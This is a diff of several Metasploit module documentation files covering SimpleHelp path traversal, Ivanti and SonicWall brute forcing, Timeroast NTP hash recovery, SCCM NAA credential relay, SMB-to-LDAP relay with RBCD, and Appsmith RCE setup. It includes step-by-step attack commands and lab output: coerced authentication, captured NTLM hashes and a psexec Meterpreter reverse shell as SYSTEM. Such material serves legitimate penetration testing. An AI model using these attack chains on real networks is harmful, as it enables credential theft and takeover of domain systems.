+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set filepath windows/system.ini
+filepath => windows/system.ini
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set depth 4
+depth => 4
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 219 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] exec: cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+```
@@ -0,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against Ivanti Connect Secure.
+It allows to attack both regular user and admin as well - you can select which type of account to attack with `ADMIN` parameter. 
+
+## Vulnerable Application
+
+- [Ivanti](https://www.ivanti.com/products/connect-secure-vpn)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/ivanti/ivanti_login`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set ADMIN [attack admin?]`
+6. `run`
+
+
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+## Verification Steps
+
+1. Use the supplied Dockerfile to start a vulnerable instance of the application
+   1. Build it with: `docker build -t ntpd:4.2.8p3 .`
+   1. Run it with: `docker run --rm -it --name ntp-server -p 123:123/udp ntpd:4.2.8p3`
+1. Start `msfconsole` and use the module
+1. Set the `RHOSTS` value as necessary
+1. Run the module and see that the target is vulnerable
+
+### Dockerfile
+Use this as `ntp.conf`:
+
+```
+# Basic NTP configuration
+server 0.pool.ntp.org iburst
+server 1.pool.ntp.org iburst
+server 2.pool.ntp.org iburst
+server 3.pool.ntp.org iburst
+
+driftfile /var/lib/ntp/ntp.drift
+
+# Enable authentication for secure associations
+enable auth
+
+# Define trusted keys
+trustedkey 1
+
+# Open restrictions for all clients on the local network (example: 192.168.0.0/16)
+restrict default kod nomodify notrap
+restrict 127.0.0.1
+restrict ::1
+restrict 192.168.0.0 mask 255.255.0.0 autokey
+
+# Uncomment to allow all clients (use cautiously)
+# restrict default kod nomodify notrap
+```
+
+Use this as `Dockerfile`:
+
+```
+ARG version=4.2.8p3
+FROM ubuntu:16.04
+ARG version
+
+# Install dependencies
+RUN apt-get update && apt-get install -y \
+    wget \
+    build-essential \
+    libcap-dev \
+    libssl-dev && \
+    apt-get clean
+
+# Download and build NTPD
+WORKDIR /tmp
+RUN wget https://web.archive.org/web/20240608062853/https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-$version.tar.gz && \
+    tar -xzf ntp-$version.tar.gz && \
+    cd ntp-$version && \
+    ./configure --prefix=/usr/local --enable-linuxcaps && \
+    make && \
+    make install && \
+    cd .. && \
+    rm -rf ntp-$version*
+
+# Add configuration file
+COPY ntp.conf /etc/ntp.conf
+
+# Expose NTP port (123)
+EXPOSE 123/udp
+
+# Run ntpd
+ENTRYPOINT ["/usr/local/bin/ntpd"]
+CMD ["-g", "-d", "-d"]
+```
+
+## Options
+
+## Scenarios
+
+### Ubuntu 16.04 NTPd 4.2.8p3
+
+```
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) > set RHOSTS 192.168.159.128, 192.168.159.10
+RHOSTS => 192.168.159.128, 192.168.159.10
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) > run
+[+] 192.168.159.128:123 - NTP - VULNERABLE: Accepted a NTP symmetric active association
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) >
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+Windows authenticates NTP requests by calculating the message digest using the NT hash followed by the first
+48 bytes of the NTP message (all fields preceding the key ID). An attacker can abuse this to recover hashes
+that can be cracked offline for machine and trust accounts. The attacker must know the accounts RID, but
+because RIDs are sequential, they can easily be enumerated.
+
+## Verification Steps
+
+1. Setup a Windows domain controller target
+1. Start msfconsole
+1. Use the `auxiliary/admin/dcerpc/samr_account` module to create a new computer account with the `ADD_COMPUTER` action
+   1. Note the RID (the last part of the SID) and password of the new account
+1. Use the `auxiliary/scanner/ntp/timeroast` module
+1. Set the `RHOSTS` option to the target domain controller
+1. Set the `RIDS` option to the RID of the new account
+1. Run the module and see that a hash is collected, this has will show up in the output of the `creds` command if a
+  database is connected
+
+## Options
+
+### RIDS
+The RIDs to enumerate (e.g. 1000-2000). Multiple values and ranges can be specified using a comma as a separator.
+
+## Scenarios
+
+### Windows 2019 x64 Domain Controller
+
+```
+msf6 auxiliary(scanner/ntp/timeroast) > set RIDS 4200-4205
+RIDS => 4200-4205
+msf6 auxiliary(scanner/ntp/timeroast) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/ntp/timeroast) > run
+[*] Checking RID: 4200
+[*] Checking RID: 4201
+[+] Hash for RID: 4201 - 4201:$sntp-ms$74e3c4ac73afe868119ff98613888d48$1c0100e900000000000a2c704c4f434ceb0aaf8ac9813bd40000000000000000eb0aea216d99a558eb0aea216d99e010
+[*] Checking RID: 4202
+[+] Hash for RID: 4202 - 4202:$sntp-ms$e106388a43f6bbd5365e3a6f2dee741d$1c0100e900000000000a2c704c4f434ceb0aaf8ac78c5c9a0000000000000000eb0aea21bb83de46eb0aea21bb8442f0
+[*] Checking RID: 4203
+[*] Checking RID: 4204
+[+] Hash for RID: 4204 - 4204:$sntp-ms$d0b1961cc3d57a1eaa40bfeeb9f30eb9$1c0100e900000000000a2c704c4f434ceb0aaf8ac653c2f50000000000000000eb0aea222a6c25c3eb0aea222a6c6a8c
+[*] Checking RID: 4205
+[*] Waiting on 3 pending responses...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ntp/timeroast) >
+```
@@ -0,0 +1,19 @@
+## Description
+
+The module will perform a bruteforce attack against SonicWall NSv (Network Security Virtual).
+It allows attacking both regular SSLVPN users and as well as admins. The module will automatically target SSLVPN users if the `DOMAIN` parameter is not empty.
+
+## Vulnerable Application
+
+- [SonicWall](https://www.sonicwall.com/resources/trials-landing/sonicwall-nsv-next-gen-virtual-firewall-trial)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/sonicwall/sonicwall_login`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set DOMAIN [domain to attack/empty string to attack admin account]`
+6. `run`
+
+
@@ -20,10 +20,12 @@ The issue mode. This controls what the module will do once an authenticated sess
 server. Must be one of the following options:

 * ALL: Enumerate all available certificate templates and then issue each of them
-* AUTO: Automatically select either the `User` or `Machine` template to issue based on if the authenticated user is a
-  user or machine account. The determination is based on checking for a `$` at the end of the name, which means that it
-  is a machine account.
-* QUERY_ONLY: Enumerate all available certificate templates but do not issue any
+* AUTO: Automatically select either the `User` or `DomainController` and `Machine` (`Computer`) templates to issue
+  based on if the authenticated user is a user or machine account. The determination is based on checking for a `$` 
+  at the end of the name, which means that it is a machine account.
+* QUERY_ONLY: Enumerate all available certificate templates but do not issue any.  Not all certificate templates
+  available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and 
+  include `Machine` (AKA `Computer`) and `DomainController`  
 * SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option

 ### CERT_TEMPLATE
@@ -0,0 +1,149 @@
+## Description
+This module creates an SMB server and then relays the credentials passed to it to SCCM's HTTP server (aka Management Point)
+to gain an authenticated connection. Once authenticated it then attempts to retrieve  the Network Access Account(s),
+if configured, from the SCCM server. This requires a computer account,  which can be added using the samr_account module.
+
+This module is essentially the `get_naa_credential` module with relaying capability.
+
+The NAA account is used by some SCCM configurations in the policy deployment process. It does not require many privileges, but
+in practice is often misconfigured to have excessive privileges.
+
+The account can be retrieved in various ways, many requiring local administrative privileges on an existing host. However,
+it can also be requested by an existing computer account, which by default most user accounts are able to create.
+
+
+## Vulnerable Application
+This module can be tested using the GOAD environment. Setup instructions can be found here:
+https://github.com/Orange-Cyberdefense/GOAD
+
+## Module usage
+The `admin/dcerpc/samr_computer` module is generally used to first create a computer account, which requires no permissions:
+
+1. From msfconsole
+1. Do: `use auxiliary/admin/dcerpc/samr_account`
+1. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   a. For the `ADD_COMPUTER` action, if you don't specify `ACCOUNT_NAME` or `ACCOUNT_PASSWORD` - one will be generated automatically
+   b. For the `DELETE_ACCOUNT` action, set the `ACCOUNT_NAME` option
+   c. For the `LOOKUP_ACCOUNT` action, set the `ACCOUNT_NAME` option
+1. Run the module and see that a new machine account was added
+
+Then use `ldap_query` to determine the `MANAGEMENT_POINT` and `SITE_CODE` values.
+
+1. Do: `use gather/ldap_query`
+1. Set: `DOMAIN` `RHOSTS` `USERNAME` `PASSWORD` `ACTION=RUN_SINGLE_QUERY` `QUERY_FILTER=(objectclass=mssmsmanagementpoint)` and `QUERY_ATTRIBUTES=cn,dnshostname,mssmssitecode`
+1. Run the module and note the `dnshostname` and `mssmssitecode` values
+
+
+Then the `auxiliary/server/relay/relay_get_naa_credentials` module can be used:
+
+1. `use server/relay/relay_get_naa_credentials`
+1. Set the `MANAGEMENT_POINT`, `SITE_CODE` 
+1. Run the module to obtain the NAA credentials, if present.
+
+The management point and site code can be retrieved using the `auxiliary/gather/ldap_query` module, using the `ENUM_SCCM_MANAGEMENT_POINTS` action.
+
+See the Scenarios for a more detailed walk through
+
+## Options
+
+### RHOST, USERNAME, PASSWORD, DOMAIN, SESSION, RHOST
+Options used to authenticate to the Domain Controller's LDAP service for SCCM autodiscovery.
+
+### MANAGEMENT_POINT
+The SCCM server.
+
+### SITE_CODE
+The Site Code of the management point.
+
+### TIMEOUT
+The number of seconds to wait for SCCM DB to update
+
+## Scenarios
+In the following example the user `ssccm.lab\eve` is a low-privilege user.
+
+### Creating computer account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run rhost=192.168.33.10 domain=sccm.lab username=eve password=iloveyou
+[*] Running module against 192.168.33.10
+
+[*] 192.168.33.10:445 - Adding computer
+[+] 192.168.33.10:445 - Successfully created sccm.lab\DESKTOP-5FJM1832$
+[+] 192.168.33.10:445 -   Password: JpnYZ43YHqmoOLj9xBKdI9tVFgDXtfsu
+[+] 192.168.33.10:445 -   SID:      S-1-5-21-3875312677-2561575051-1173664991-1128
+[*] Auxiliary module execution completed
+```
+
+### Manual discovery of SITE_CODE and MANAGEMENT_POINT using domain credentials
+
+```
+msf6 auxiliary(gather/ldap_query) > run domain=sccm.lab rhosts=192.168.56.10 username=eve password=iloveyou action=RUN_SINGLE_QUERY QUERY_FILTER=(objectclass=mssmsmanagementpoint) QUERY_ATTRIBUTES=cn,dnshostname,mssmssitecode
+[*] Running module against 192.168.56.10
+[*] 192.168.56.10:389 Discovered base DN: DC=sccm,DC=lab
+[*] Sending single query (objectclass=mssmsmanagementpoint) to the LDAP server...
+CN=SMS-MP-P01-MECM.SCCM.LAB,CN=System Management,CN=System,DC=sccm,DC=lab
+=========================================================================
+
+ Name           Attributes
+ ----           ----------
+ cn             SMS-MP-P01-MECM.SCCM.LAB
+ dnshostname    MECM.sccm.lab
+ mssmssitecode  P01
+
+[*] Query returned 1 result.
+[*] Auxiliary module execution completed
+```
+
+### Initiating SMB authentication from a Windows Host
+Currently the SMB auth attempt must originate from a Windows Host, see: https://github.com/rapid7/metasploit-framework/issues/19951
+```
+net use \\192.168.56.1\foo /u:SCCM.LAB\DESKTOP-5FJM1832$ JpnYZ43YHqmoOLj9xBKdI9tVFgDXtfsu
+```
+
+### Running the module
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use relay_get
+
+Matching Modules
+================
+
+   #  Name                                              Disclosure Date  Rank    Check  Description
+   -  ----                                              ---------------  ----    -----  -----------
+   0  auxiliary/server/relay/relay_get_naa_credentials  .                normal  Yes    SMB to HTTP relay version of Get NAA Creds
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/server/relay/relay_get_naa_credentials
+
+[*] Using auxiliary/server/relay/relay_get_naa_credentials
+[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
+msf6 auxiliary(server/relay/relay_get_naa_credentials) >  dns add-static mecm.sccm.lab 192.168.56.11
+[*] Added static hostname mapping mecm.sccm.lab to 192.168.56.11
+msf6 auxiliary(server/relay/relay_get_naa_credentials) > run rhost=192.168.56.11 smbdomain=sccm.lab MANAGEMENT_POINT=MECM.sccm.lab SITE_CODE=P01
+[*] Auxiliary module running as background job 0.
+
+[*] Checking endpoint on http://192.168.56.11:80/ccm_system_windowsauth/request
+msf6 auxiliary(server/relay/relay_get_naa_credentials) > [*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.56.1
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Relaying to next target http://192.168.56.11:80/ccm_system_windowsauth/request
+[+] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - Successfully authenticated against relay target http://192.168.56.11:80/ccm_system_windowsauth/request
+[SMB] NTLMv2-SSP Client     : 192.168.56.11
+[SMB] NTLMv2-SSP Username   : SCCM.LAB\DESKTOP-5FJM1832$
+[SMB] NTLMv2-SSP Hash       : DESKTOP-5FJM1832$::SCCM.LAB:42465e4768dcb113:c5248825d2326b730a23ff5986cc36d8:0101000000000000662037ebd78edb01344978b20c2f7baa0000000002000e005300430043004d004c0041004200010008004d00450043004d00040010007300630063006d002e006c006100620003001a004d00450043004d002e007300630063006d002e006c0061006200050010007300630063006d002e006c006100620007000800662037ebd78edb01060004000200000008003000300000000000000001000000002000002cd075c2fac7f6ea5a6a290f03ae2e6476afc69a4e85c3e91bab8a5ac0d7603e0a001000000000000000000000000000000000000900220063006900660073002f003100390032002e003100360038002e00350036002e0031000000000000000000
+
+[+] This your capitan speaking we've reached the on_relay_success method :)
+[*] Got SMS ID: D61057A2-0B02-40B3-9ADC-F349BA5EC8C2
+[*] Waiting 10 seconds for SCCM DB to update...
+[*] Found policy containing secrets: http://<mp>/SMS_MP/.sms_pol?{e98163c7-7b3a-4c3d-bb69-2b398c492290}.2_00
+[+] Found valid NAA credentials: sccm.lab\sccm-naa:123456789
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] New request from 192.168.56.1
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+[*] Received request for SCCM.LAB\DESKTOP-5FJM1832$
+[*] Identity: SCCM.LAB\DESKTOP-5FJM1832$ - All targets relayed to
+```
@@ -0,0 +1,314 @@
+## Vulnerable Application
+
+This module supports running an SMB server which validates credentials, and
+then attempts to execute a relay attack against an LDAP server on the
+configured RELAY_TARGETS hosts.
+
+It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check
+(MIC). As a result, this will only work with NTLMv1. The module takes care of
+removing the relevant flags to bypass signing.
+
+If the relay succeeds, an LDAP session to the target will be created. This can
+be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or
+`auxiliary/gather/ldap_query`.
+
+Supports SMBv2, SMBv3, and captures NTLMv1 as well as NTLMv2 hashes.
+SMBv1 is not supported - please see https://github.com/rapid7/metasploit-framework/issues/16261
+
+
+## Verification Steps
+
+### Lab setup
+You will need a Domain Controller and a Domain-joined host:
+
+Domain Computer <-> Metasploit framework <-> Domain Controller
+
+Where:
+
+- Domain name: NEWLAB.local
+- VICTIM (Domain Computer) = 192.168.232.111
+- msfconsole = 192.168.232.3
+- DC01 (Domain Controller) = 192.168.232.110
+
+```mermaid
+flowchart LR
+    A("VICTIM (Domain Computer) - 192.168.232.111")
+    subgraph metasploit[" msfconsole - 192.168.232.3 "]
+        subgraph inside [ ]
+            direction TB
+            style inside margin-top: 0
+            style inside stroke: none
+
+            B("smb_to_ldap")
+            database[(Database)]
+
+            B -->|"report_ntlm_type3(...)"| database
+        end
+    end
+    C("DC01 (Domain Controller) - 192.168.232.110")
+
+    A <-->|SMB 445| metasploit
+    metasploit <-->|"ldap session (TCP/389)"| C
+```
+
+The Domain Computer will need to be configured to use NTLMv1 by setting the
+following registry key to a value less or equal to 2:
+
+```
+PS > reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel /t REG_DWORD /d 0x2 /f
+```
+
+```
+PS > reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa -v LmCompatibilityLevel
+
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
+    LmCompatibilityLevel    REG_DWORD    0x2
+```
+
+Finally run the relay server on msfconsole, setting the `RELAY_TARGETS` option
+to the Domain Controller IP address.
+
+```
+run verbose=true RELAY_TARGETS=192.168.232.110
+```
+
+You will have to coerce the Domain Computer and force it to authenticate to the
+msfconsole server (see an example below).
+
+
+## Options
+
+### RELAY_TARGETS
+
+Target address range or CIDR identifier to relay to.
+
+### CAINPWFILE
+
+A file to store Cain & Abel formatted captured hashes in. Only supports NTLMv1 Hashes.
+
+### JOHNPWFILE
+
+A file to store John the Ripper formatted hashes in. NTLMv1 and NTLMv2 hashes
+will be stored in separate files.
+I.E. the filename john will produce two files, `john_netntlm` and `john_netntlmv2`.
+
+### RELAY_TIMEOUT
+
+Seconds that the relay socket will wait for a response after the client has
+initiated communication (default 25 sec.).
+
+### SMBDomain
+
+The domain name used during SMB exchange.
+
+
+## Scenarios
+
+### Start the relay server
+```
+msf6 > use auxiliary/server/relay/smb_to_ldap
+msf6 auxiliary(server/relay/smb_to_ldap) > run verbose=true RELAY_TARGETS=192.168.232.110
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/relay/smb_to_ldap) >
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+
+msf6 auxiliary(server/relay/smb_to_ldap) > _servicemanager
+Services
+========
+
+ Id  Name                                                              References
+ --  ----                                                              ----------
+ 0   Msf::Exploit::Remote::SMB::RelayServer::SMBRelayServer0.0.0.0445  2
+ 1   SMB Relay Server                                                  2
+```
+
+### Net use example
+A simple test would be using the Windows `net use` command:
+
+```
+net use \\192.168.232.3\foo /u:Administrator 123456
+```
+
+msfconsole output:
+
+```
+[*] New request from 192.168.232.111
+[*] Received request for \Administrator
+[*] Relaying to next target ldap://192.168.232.110:389
+[+] Identity: \Administrator - Successfully authenticated against relay target ldap://192.168.232.110:389
+[+] Relay succeeded
+[*] LDAP session 1 opened (192.168.232.3:45007 -> 192.168.232.110:389) at 2025-01-23 20:39:45 +0100
+[*] Received request for \Administrator
+[*] Identity: \Administrator - All targets relayed to
+[*] New request from 192.168.232.111
+[*] Received request for NEWLAB\Administrator
+[*] Relaying to next target ldap://192.168.232.110:389
+[+] Identity: NEWLAB\Administrator - Successfully authenticated against relay target ldap://192.168.232.110:389
+[+] Relay succeeded
+[*] LDAP session 2 opened (192.168.232.3:43845 -> 192.168.232.110:389) at 2025-01-23 20:39:46 +0100
+[*] Received request for NEWLAB\Administrator
+[*] Identity: NEWLAB\Administrator - All targets relayed to
+
+msf6 auxiliary(server/relay/smb_to_ldap) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type  Information                               Connection
+  --  ----  ----  -----------                               ----------
+  1         ldap  LDAP Administrator @ 192.168.232.110:389  192.168.232.3:45007 -> 192.168.232.110:389 (192.168.232.110)
+  2         ldap  LDAP Administrator @ 192.168.232.110:389  192.168.232.3:43845 -> 192.168.232.110:389 (192.168.232.110)
+```
+
+### PetitPotam example
+
+Coerce authentication using a non-privileged Domain User account with PetitPotam:
+
+```
+msf6 auxiliary(scanner/dcerpc/petitpotam) > run verbose=true rhosts=192.168.232.111 listener=192.168.232.3 SMBUser=msfuser SMBPass=123456 SMBDomain=newlab.local
+[*] 192.168.232.111:445   - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
+[*] 192.168.232.111:445   - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.232.111[\lsarpc] ...
+[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcOpenFileRaw
+[*] 192.168.232.111:445   - Server responded with ERROR_ACCESS_DENIED (Access is denied.)
+[*] 192.168.232.111:445   - Attempting to coerce authentication via EfsRpcEncryptFileSrv
+
+[*] New request from 192.168.232.111
+[*] Received request for NEWLAB\VICTIM$
+[*] Relaying to next target ldap://192.168.232.110:389
+[+] Identity: NEWLAB\VICTIM$ - Successfully authenticated against relay target ldap://192.168.232.110:389
+[*] Skipping previously captured hash for NEWLAB\VICTIM$
+[+] Relay succeeded
+[*] LDAP session 1 opened (192.168.232.3:46691 -> 192.168.232.110:389) at 2025-01-23 19:19:18 +0100
+[*] Received request for NEWLAB\VICTIM$
+[*] Identity: NEWLAB\VICTIM$ - All targets relayed to
+
+[+] 192.168.232.111:445   - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
+[*] 192.168.232.111:445   - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(scanner/dcerpc/petitpotam) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type  Information                               Connection
+  --  ----  ----  -----------                               ----------
+  1         ldap  LDAP VICTIM$ @ 192.168.232.110:389  192.168.232.3:46691 -> 192.168.232.110:389 (192.168.232.110)
+
+msf6 auxiliary(scanner/dcerpc/petitpotam) > sessions -i 1
+[*] Starting interaction with 1...
+
+LDAP (192.168.232.110) > query -f (sAMAccountName=VICTIM$)
+CN=VICTIM,CN=Computers,DC=newlab,DC=local
+===============================================
+
+ Name                                      Attributes
+ ----                                      ----------
+ accountexpires                            9223372036854775807
+ badpasswordtime                           133820110912034399
+ badpwdcount                               0
+ cn                                        VICTIM
+ ...
+
+LDAP (192.168.232.110) >
+Background session 1? [y/N]
+```
+
+### Exploit Resource-based Constrained Delegation (RBCD)
+
+For details about RCBD, see https://docs.metasploit.com/docs/pentesting/active-directory/kerberos/rbcd.html#rbcd-exploitation
+
+- Create a computer account with the `admin/dcerpc/samr_account` module and the same Domain User account
+
+```
+msf6 auxiliary(admin/dcerpc/samr_account) > run verbose=true rhost=192.168.232.110 SMBUser=msfuser SMBPASS=123456 SMBDomain=newlab.local action=ADD_COMPUTER ACCOUNT_NAME=FAKE01$ ACCOUNT_PASSWORD=123456
+[*] Running module against 192.168.232.110
+[*] 192.168.232.110:445 - Adding computer
+[*] 192.168.232.110:445 - Connecting to Security Account Manager (SAM) Remote Protocol
+[*] 192.168.232.110:445 - Binding to \samr...
+[+] 192.168.232.110:445 - Bound to \samr
+[+] 192.168.232.110:445 - Successfully created newlab.local\FAKE01$
+[+] 192.168.232.110:445 -   Password: 123456
+[+] 192.168.232.110:445 -   SID:      S-1-5-21-3065298949-3337206023-618530601-1618
+[*] Auxiliary module execution completed
+```
+
+- Setup RBCD with the `admin/ldap/rbcd` module using the LDAP session
+
+```
+msf6 auxiliary(admin/ldap/rbcd) > run verbose=true rhost=192.168.232.110 session=1 delegate_to=VICTIM action=READ
+[*] Running module against 192.168.232.110
+[+] Successfully bound to the LDAP server via existing SESSION!
+[*] Discovering base DN automatically
+[*] The msDS-AllowedToActOnBehalfOfOtherIdentity field is empty.
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(admin/ldap/rbcd) > run verbose=true rhost=192.168.232.110 session=1 delegate_to=VICTIM action=WRITE delegate_from=FAKE01$
+[*] Running module against 192.168.232.110
+[+] Successfully bound to the LDAP server via existing SESSION!
+[*] Discovering base DN automatically
+[+] Successfully created the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
+[*] Added account:
+[*]   S-1-5-21-3065298949-3337206023-618530601-1618 (FAKE01$)
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(admin/ldap/rbcd) > run verbose=true rhost=192.168.232.110 session=1 delegate_to=VICTIM action=READ
+[*] Running module against 192.168.232.110
+[+] Successfully bound to the LDAP server via existing SESSION!
+[*] Discovering base DN automatically
+[*] Allowed accounts:
+[*]   S-1-5-21-3065298949-3337206023-618530601-1618 (FAKE01$)
+[*] Auxiliary module execution completed
+```
+
+- Getting the Kerberos tickets using the `admin/kerberos/get_ticket` module
+
+```
+msf6 auxiliary(admin/kerberos/get_ticket) > run action=GET_TGS rhost=192.168.232.110 username=FAKE01 password=123456 domain=newlab.local spn=cifs/VICTIM.newlab.local impersonate=Administrator
+[*] Running module against 192.168.232.110
+[+] 192.168.232.110:88 - Received a valid TGT-Response
+[*] 192.168.232.110:88 - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_759601.bin
+[*] 192.168.232.110:88 - Getting TGS impersonating Administrator@newlab.local (SPN: cifs/VICTIM.newlab.local)
+[+] 192.168.232.110:88 - Received a valid TGS-Response
+[*] 192.168.232.110:88 - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_975187.bin
+[+] 192.168.232.110:88 - Received a valid TGS-Response
+[*] 192.168.232.110:88 - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_335229.bin
+[*] Auxiliary module execution completed
+```
+
+- Code execution using the `windows/smb/psexec` module
+
+```
+msf6 exploit(windows/smb/psexec) > klist
+Kerberos Cache
+==============
+id   host             principal                   sname                                        enctype  issued                     status  path
+--   ----             ---------                   -----                                        -------  ------                     ------  ----
+105  192.168.232.110  FAKE01@NEWLAB.LOCAL         krbtgt/NEWLAB.LOCAL@NEWLAB.LOCAL             AES256   2025-01-23 19:29:59 +0100  active  /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_759601.bin
+106  192.168.232.110  Administrator@NEWLAB.LOCAL  FAKE01@NEWLAB.LOCAL                          AES256   2025-01-23 19:29:59 +0100  active  /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_975187.bin
+107  192.168.232.110  Administrator@NEWLAB.LOCAL  cifs/VICTIM.newlab.local@NEWLAB.LOCAL        AES256   2025-01-23 19:29:59 +0100  active  /home/n00tmeg/.msf4/loot/20250123192959_default_192.168.232.110_mit.kerberos.cca_335229.bin
+
+msf6 exploit(windows/smb/psexec) > run lhost=192.168.232.3 rhost=192.168.232.111 username=Administrator smb::auth=kerberos smb::rhostname=VICTIM.newlab.local domaincontrollerrhost=192.168.232.110 domain=newlab.local
+[*] Started reverse TCP handler on 192.168.232.3:4444
+[*] 192.168.232.111:445 - Connecting to the server...
+[*] 192.168.232.111:445 - Authenticating to 192.168.232.111:445|newlab.local as user 'Administrator'...
+[*] 192.168.232.111:445 - Using cached credential for cifs/VICTIM.newlab.local@NEWLAB.LOCAL Administrator@NEWLAB.LOCAL
+[*] 192.168.232.111:445 - Selecting PowerShell target
+[*] 192.168.232.111:445 - Executing the payload...
+[+] 192.168.232.111:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (177734 bytes) to 192.168.232.111
+[*] Meterpreter session 1 opened (192.168.232.3:4444 -> 192.168.232.111:42528) at 2025-01-23 19:35:07 +0100
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : VICTIM
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : NEWLAB
+Logged On Users : 9
+Meterpreter     : x86/windows
+```
+
@@ -0,0 +1,105 @@
+## Vulnerable Application
+
+An incorrectly configured PostgreSQL instance in the Appsmith image leads to remote command execution inside the Appsmith Docker container.
+
+The vulnerability affects:
+
+    * v1.20 <= Appsmith <= v1.51
+
+This module was successfully tested on:
+
+    * Appsmith v1.50 installed with Docker
+
+
+### Installation
+
+1. Create a docker-compose.yml file with:
+```
+version: "3"
+services:
+   appsmith:
+     image: index.docker.io/appsmith/appsmith-ce:v1.50
+     container_name: appsmith
+     ports:
+         - "80:80"
+         - "443:443"
+     volumes:
+         - ./stacks:/appsmith-stacks
+     restart: unless-stopped
+```
+
+2. `docker-compose up`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/appsmith_rce_cve_2024_55964`
